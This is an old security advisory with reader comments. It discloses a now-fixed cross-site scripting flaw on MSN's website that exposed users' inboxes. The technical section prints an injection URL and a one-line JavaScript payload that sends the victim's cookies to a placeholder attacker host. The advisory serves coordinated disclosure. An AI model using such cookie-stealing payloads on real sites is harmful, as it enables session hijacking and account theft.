|
|
| |
| A cookie-stealing Cross-site scripting vulnerability was found on MSN's website (msn.com). Using this vulnerability, an attacker could potentially gain access to a victim's Inbox. |
| |
Credit:
The vulnerability was discovered by tontonq and Nir Goldshlager.
This information has been provided by SecuriTeam.
|
| |
Summary
A cookie-stealing Cross-site scripting vulnerability was found on MSN's
website (msn.com). Using this vulnerability, an attacker could potentially
gain access to a victim's Inbox.
This vulnerability was discovered by: tontonq and Nir Goldshlager.
Disclosure timeline
SecuriTeam was asked to assist the researchers with contacting Microsoft.
Reported to vendor: 18th of July, 2006.
Vendor response: 18th of July, 2006.
Resolved: 19th of July, 2006.
Public disclosure: 25th of July, 2006.
Technical description
A cookie-stealing XSS issue was discovered on MSN's web site.
Example of the issue:
http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js
That error page gets the CB variable into a script tag.
If John Doe wanted to steal a victim's cookie, he could use this example Javascript
code:
i=new/**/Image();i.src='http://his_stealer/s.php?cookie='+document.cookie;
As such, if for example, s.php stores the cookie variable somewhere, the
attacker can set that stored cookie and "jump" to the Inbox.
For illustration, an older similar issue from 2005 on hotmail.com discovered by Alex de Vries can be found here:
http://www.net-force.nl/files/articles/hotmail_xss/
About SecuriTeam's Assisted Disclosure
Many researchers do not have the time, energy or inclination to deal with
reporting a vulnerability to vendors.
SecuriTeam is here to help. If you want us to handle the logistics of
contacting and following up with the vendor, making sure the problem is
fixed, contact: STAD@SecuriTeam.com.
Our end goal is Full Disclosure, preferably in coordination with the vendor,
without exposing the researcher to unnecessary risk.
We do not believe in hiding or selling vulnerabilities. Never had, never will.
All credit will be properly attributed. If asked we can act as proxies,
keeping your privacy and anonymity.
|
| Subject:
|
so with this |
Date: |
25 Jul. 2006 |
| From: |
Josh |
| Someone can read my email? |
|
| Subject:
|
nice |
Date: |
26 Jul. 2006 |
| From: |
K1ngw0rm |
| Very nice work thanx |
|
| Subject:
|
Read Mail |
Date: |
26 Jul. 2006 |
| From: |
Tontonq |
@
From: Josh
Someone can read my email?
if you dont use livemail & clicked to xss link they may read your mails and chage password :) |
|
| Subject:
|
hotmail sucks thanks alot securiteam |
Date: |
26 Jul. 2006 |
| From: |
anoynmous |
i dont realy like hotmail because they give only 10mb
but alots of us use hotmail so i think its realy important that hotmail will fix thier holes
thanks alot securiteam for this intersting advisory
|
|
| Subject:
|
Nice Expl0itidition |
Date: |
28 Jul. 2006 |
| From: |
Spammeanddie |
Heyy dude Tontonq, can be a bit nice stuff but you havent find bypassing filters or exploitiding Msn' subdomain image trustability... Yeah it is 0day & underground... & Last keep this up...
You know me... |
|
| Subject:
|
thx |
Date: |
29 Jul. 2006 |
| From: |
anoynmous |
| xss closed open ?? |
|
| Subject:
|
mau belajar |
Date: |
30 Jul. 2006 |
| From: |
justriugienkjustri_antoyahoo.com |
kek mana kalo aku mau belajar .... kira?bisa gak aku ikutan ama klian semua
Please kasi tau trik donk ?? |
|
| Subject:
|
hi |
Date: |
7 Aug. 2006 |
| From: |
ML3o0o0o0o0o0o0N |
| ok man |
|
| Subject:
|
nice |
Date: |
9 Aug. 2006 |
| From: |
al3na |
| but I think he is closed by hotmail |
|
| Subject:
|
a new one exist |
Date: |
30 Aug. 2006 |
| From: |
saeel |
| a new bug of same type exist |
|
|
|
|
